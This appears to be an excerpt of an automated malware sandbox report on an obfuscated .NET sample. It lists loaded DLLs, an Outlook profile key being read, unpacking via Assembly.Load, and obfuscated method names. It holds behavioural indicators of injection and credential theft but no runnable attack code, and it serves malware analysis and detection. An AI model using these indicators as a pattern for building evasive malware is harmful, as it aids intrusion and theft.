                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: 0t7MXNEfCg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 0t7MXNEfCg.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: 0t7MXNEfCg.exeStatic file information: File size 1088520 > 1048576
                Source: 0t7MXNEfCg.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x105a00
                Source: 0t7MXNEfCg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 00000007.00000002.1092861532.0000000000948000.00000004.00000020.00020000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000002.3312326160.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: EhStorAuthn.exe, 0000000F.00000002.3312040086.000000000355A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.000000000576C000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158675658.00000000033BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1394289093.000000001313C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000007.00000002.1093299321.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1092408126.0000000004DED000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1094405634.0000000004F95000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.0000000005140000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.1093299321.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1092408126.0000000004DED000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1094405634.0000000004F95000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314113769.0000000005140000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 00000007.00000002.1092861532.0000000000948000.00000004.00000020.00020000.00000000.sdmp, nufnwZ9IW.exe, 0000000D.00000002.3312326160.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: EhStorAuthn.exe, 0000000F.00000002.3312040086.000000000355A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.000000000576C000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000000.1158675658.00000000033BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1394289093.000000001313C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nufnwZ9IW.exe, 0000000D.00000000.1013826041.000000000013F000.00000002.00000001.01000000.0000000B.sdmp, nufnwZ9IW.exe, 00000010.00000002.3311041959.000000000013F000.00000002.00000001.01000000.0000000B.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeUnpacked PE file: 0.2.0t7MXNEfCg.exe.c70000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeUnpacked PE file: 0.2.0t7MXNEfCg.exe.c70000.0.unpack
                .NET source code contains potential unpacker
                Source: 0.2.0t7MXNEfCg.exe.49ce5c0.4.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, hISkYvQ5NV6mByK8fF.cs.Net Code: kR4vs61ZC5 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, hISkYvQ5NV6mByK8fF.cs.Net Code: kR4vs61ZC5 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, hISkYvQ5NV6mByK8fF.cs.Net Code: kR4vs61ZC5 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.0t7MXNEfCg.exe.9c80000.7.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.0t7MXNEfCg.exe.32cfdc8.2.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 8.2.HrovwwypYVlFWB.exe.34cec80.1.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0t7MXNEfCg.exeStatic PE information: 0x83BF88F6 [Mon Jan 16 23:02:14 2040 UTC]
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0B02CAD5 push FFFFFF8Bh; iretd 0_2_0B02CAD7
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0B024958 push ds; iretd 0_2_0B024962
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0B0298CC push E8FFFFFEh; retf 0_2_0B0298D1
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0B024770 push ss; iretd 0_2_0B02477A
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0B02477B push ss; iretd 0_2_0B02478A
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0B0247AB push ss; iretd 0_2_0B02477A
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0B02AD80 push ds; iretd 0_2_0B02AD86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004071FF push C35DE58Bh; ret 7_2_00407237
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00403260 push eax; ret 7_2_00403262
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00408395 push ss; ret 7_2_00408397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004124E9 push eax; retf 7_2_004124EA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040B528 pushad ; retf 7_2_0040B52A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040D53D push esi; retf 7_2_0040D53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041ED9A pushad ; retf 7_2_0041ED9B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041ED9E pushad ; iretd 7_2_0041EDA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004146A6 push cs; iretd 7_2_004146BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00E8225F pushad ; ret 7_2_00E827F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00E827FA pushad ; ret 7_2_00E827F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00E8283D push eax; iretd 7_2_00E82858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB09AD push ecx; mov dword ptr [esp], ecx7_2_00EB09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00E81368 push eax; iretd 7_2_00E81369
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_0AB1BAB5 push FFFFFF8Bh; iretd 8_2_0AB1BAB7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012E09AD push ecx; mov dword ptr [esp], ecx12_2_012E09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012B1FEC push eax; iretd 12_2_012B1FED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0042E0DA push ds; iretd 12_2_0042E0E1
                Source: 0t7MXNEfCg.exeStatic PE information: section name: .text entropy: 7.55691519150212
                Source: HrovwwypYVlFWB.exe.0.drStatic PE information: section name: .text entropy: 7.55691519150212
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, f64iliBPNDre6mPqmX.csHigh entropy of concatenated method names: 'qANf46jscp', 'AjKfteJ7pq', 'fw5f0YVkY1', 'vP90JiT5cr', 'dQl0zXPaDo', 'vM4fUEZciy', 'Al7fR2E6hg', 'vwJfFvtpWf', 'ka6faeKYKo', 'DybfvZ2F3v'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, LEhlTBRUPAutV2WiidS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FDKSgmQplG', 'yooSLrfmNY', 'QAjS2qYxGG', 'FNJSl8333E', 'LRASPsBTx2', 'MP5SADijOh', 'UsHSNJ2cJu'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, n6eXSFw2UA5h51Qd8E.csHigh entropy of concatenated method names: 'glJTlKMkOw', 'MLyTPtb6ta', 'FUBTAHyylZ', 'cSaTNcKco5', 'E40T8lVqdY', 'yTSTXLaIhS', 'cuKT5XQ3Ji', 'ydfTVWiDX1', 'RTWTjcYUc9', 'Dn7TJ2iLef'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, hhrS6Q76NDYyAHKd2A.csHigh entropy of concatenated method names: 'O750uftUrP', 'bvM0TAtquh', 'hMS0OhIEw7', 'iY60fM6FC6', 'PY00QGDPpW', 'GLKO8mabjo', 'fDiOXl5TrW', 'vWeO56uORL', 'tSKOV1udis', 'xCNOjoS6Kk'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, Bv1HpA5W3dpr7MvCIY.csHigh entropy of concatenated method names: 'bc1DcnVwjj', 'VOMDGmcN71', 'scCDDB0heR', 'Lv6DEYv2Jn', 'X1EDMO84SC', 'Ie4DxtREPR', 'Dispose', 'L0Hn4BST40', 'bIcnTFuuXm', 'K8AntwnQpc'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, wWTpapXk05j7Eh2DMv.csHigh entropy of concatenated method names: 'EClGVUNjbM', 'Er9GJGcbaN', 'EXQnUTqPpu', 'XZNnRQW3kp', 'mxFGgbRwrv', 'zMCGLjR5TX', 'AKdG2ZM9Xc', 'EXRGllIPx7', 'gFxGPkXsbp', 'J7WGAB4s4P'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, GwBoCeRaNsqCa0eAhje.csHigh entropy of concatenated method names: 's18EJ8mFiu', 'KtXEzvOnth', 'VRB9UQkxAQ', 'SrwAdLjPab0w3vEsRVc', 'wZbOdYjz6nSo9h3upK5', 'OUYx2uAdtyfRMasCoEL', 'EmoymyAiAPYEfU8eqZH', 'eRL8VVAtYVLOZ5w4AlV'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, KSmB67RRfjE53Pem2VD.csHigh entropy of concatenated method names: 'oTjSJk8xfM', 'klTSz7GDt5', 'IPPEU5nRk7', 'Jk4ERV0xBt', 'xoVEF49ZmF', 'hNUEawIdLY', 'kIyEvfQTN6', 'KQHEu4VtbM', 'n8VE4AjVnd', 'r8DETVmPEf'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, TskOeV6g8oIAtWls5Z.csHigh entropy of concatenated method names: 'r3FtWgHHjJ', 'EfGtyaJXvt', 'djstwU00x0', 'Klrt6aQEGr', 'Hs3tcMwU9p', 'QJBtmNrHU0', 'e9MtGobksR', 'bnZtn7b9s5', 'au1tDej6Op', 'CBItSN5fg5'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, jlQchZ2k0fQ3fAmBYM.csHigh entropy of concatenated method names: 'Ws2HwoqQNC', 'IpTH6nIiuv', 'y1GH75MMf6', 'O3oHYhI53Y', 'YGQHk52J6q', 'geyHpMEmWJ', 'DAKHBsFRaE', 'iiWHe3VsMT', 'AQKHdwUg8j', 'u4fHgpJ11u'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, eOhFMaRvKPBteuThA1T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OrU9Dq3FQv', 'uJc9SGpbWS', 'Rx49EISVC8', 'Cew990y9t4', 'pIC9McZ8aW', 'Lgp9qg2oXr', 'fd39x7VHmj'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, ktXWBOzBckPRrD7caF.csHigh entropy of concatenated method names: 'Un9Sy4VTUt', 'Lm7SwfhlRQ', 'u13S66R2KK', 'mNHS7EyTHG', 'MB7SYefrgm', 'DiwSkpndyg', 'zJXSp6YXNk', 'BNLSxUy1Gl', 'towSZg6b73', 'KFgS300Yig'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, PNEodnCWQKK8QIoXdk.csHigh entropy of concatenated method names: 'jQqOKTxTQE', 'xGsOiY90Pa', 'ltjtr4kpTu', 'jJ8tkerbmL', 'e0ctpxpwd7', 'gj1tbSnv7n', 'piWtBvbCmm', 'em8tesrJZV', 'Mguto0tsjr', 'APVtdfwrX1'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, a2JyCioxnO13TM2WGe.csHigh entropy of concatenated method names: 'tm8fZtVZnl', 'n6df3GTFCa', 'IEEfs2JZra', 'MWcfWNhmQO', 'UIFfKVS2Qu', 'WgOfysrvnY', 'UeifiPpgi2', 'uwffw3Olfc', 'GoBf6FOGir', 'v4RfCm0ayU'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, XR3owhNrauYNYpYcJA.csHigh entropy of concatenated method names: 'xGVGhVDP6q', 'mGcG14RNYC', 'ToString', 'H4IG4pnZ91', 'DLUGTjAxDv', 'ObKGtlpIEO', 's7tGOec4Io', 'Yt4G0sjEqd', 'VifGfiMuit', 'ymRGQgUKj4'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, bDJtAQTauqFQTO0ymb.csHigh entropy of concatenated method names: 'Dispose', 'NprRj7MvCI', 'dpJFYbdOVA', 'APtS2quiwh', 'HXdRJYJKdW', 'zifRzk5hEj', 'ProcessDialogKey', 'W9KFU88PfK', 'AVDFR4qvpI', 'sdYFF4mivk'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, B88PfKjKVD4qvpISdY.csHigh entropy of concatenated method names: 'lZFD7WmVlc', 'OS8DY2rQwF', 'BqGDrCEmwU', 'jbcDk6UdFZ', 'fZiDpwYnCd', 'B7EDb3uIGh', 'd6qDB8lHqT', 'gxrDe5w2pE', 'vWxDolNr7G', 'qXjDdbbO8d'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, ihg39gFVr0Rs0dSEw5.csHigh entropy of concatenated method names: 'wOZsZSB4h', 'pOhWPFKW9', 'F0qyKwe66', 'B8OiTqoTK', 'uRs6KLLPL', 'THrCHRQvf', 'jYjFNGpC9kQdN7ZWof', 'XiyqHvehQ39xl3IhqC', 'JOnnFvVOn', 'cWUSAEPyF'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, hISkYvQ5NV6mByK8fF.csHigh entropy of concatenated method names: 'YreauYVpRC', 'lfYa4T8Vjy', 'ioMaTM5pWc', 'VWVat9K5Fs', 't0xaO4Eq7e', 'XFUa03hwDw', 'nv2afc2G5E', 'OPWaQZyyxd', 'Eq7aIwLWUv', 'GUfahqiiwe'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, rmSTFhlvm0xFks1ovR.csHigh entropy of concatenated method names: 'GWpcd7ls07', 'zSfcLUwsrK', 'AZ7clJCjjS', 'sJTcPLbydP', 'M9kcY8ajtc', 'EXFcrVs4hB', 'blAckvIDbl', 'xTTcploVOf', 't7Gcbi43tj', 'gmgcB39idD'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, fmivk3JR6hJ4HRtKJs.csHigh entropy of concatenated method names: 'JgBStQNoUD', 'ORnSOCjVD3', 'WI1S0u08Ko', 'jQcSfbKm7i', 'bQESD76EAl', 'sPMSQTQr8a', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, tWrtpMvFbRymNUpBNk.csHigh entropy of concatenated method names: 'euHRf6eXSF', 'PUARQ5h51Q', 'Xg8RhoIAtW', 'Qs5R1ZLNEo', 'loXRcdkthr', 's6QRm6NDYy', 'jZerpyM4uoraGCdDd4', 'PNrQTHPu619FSVb3fg', 'YncRRs8Sla', 'FOkRay0xbG'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, uZ81MvAt4DaV2uYW8f.csHigh entropy of concatenated method names: 'ToString', 'dG3mgFVdQ3', 'MZ7mYwacGU', 'ccqmrlm4yX', 'sjQmkcSVhd', 'GyLmpa746B', 'n1Cmbe1afe', 'bTXmB19pUy', 'au5meAfiqU', 'PVtmoGIDxf'
                Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, t5TGUNtKysAnZYRpb5.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'E9jFjvhCdI', 'f2EFJUIBon', 'EEHFzmHcDU', 'gGcaUBGvm4', 'S5IaR443JD', 'KX5aFw7Mrr', 'aOsaaAovNb', 'UCUkWBiXn3ckdd7LIIv'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, f64iliBPNDre6mPqmX.csHigh entropy of concatenated method names: 'qANf46jscp', 'AjKfteJ7pq', 'fw5f0YVkY1', 'vP90JiT5cr', 'dQl0zXPaDo', 'vM4fUEZciy', 'Al7fR2E6hg', 'vwJfFvtpWf', 'ka6faeKYKo', 'DybfvZ2F3v'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, LEhlTBRUPAutV2WiidS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FDKSgmQplG', 'yooSLrfmNY', 'QAjS2qYxGG', 'FNJSl8333E', 'LRASPsBTx2', 'MP5SADijOh', 'UsHSNJ2cJu'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, n6eXSFw2UA5h51Qd8E.csHigh entropy of concatenated method names: 'glJTlKMkOw', 'MLyTPtb6ta', 'FUBTAHyylZ', 'cSaTNcKco5', 'E40T8lVqdY', 'yTSTXLaIhS', 'cuKT5XQ3Ji', 'ydfTVWiDX1', 'RTWTjcYUc9', 'Dn7TJ2iLef'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, hhrS6Q76NDYyAHKd2A.csHigh entropy of concatenated method names: 'O750uftUrP', 'bvM0TAtquh', 'hMS0OhIEw7', 'iY60fM6FC6', 'PY00QGDPpW', 'GLKO8mabjo', 'fDiOXl5TrW', 'vWeO56uORL', 'tSKOV1udis', 'xCNOjoS6Kk'
                Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, Bv1HpA5W3dpr7MvCIY.csHigh entropy of concatenated method names: 'bc1DcnVwjj', 'VOMDGmcN71', 'scCDDB0heR', 'Lv6DEYv2Jn', 'X1EDMO84SC', 'Ie4DxtREPR', 'Dispose', 'L0Hn4BST40', 'bIcnTFuuXm', 'K8AntwnQpc'
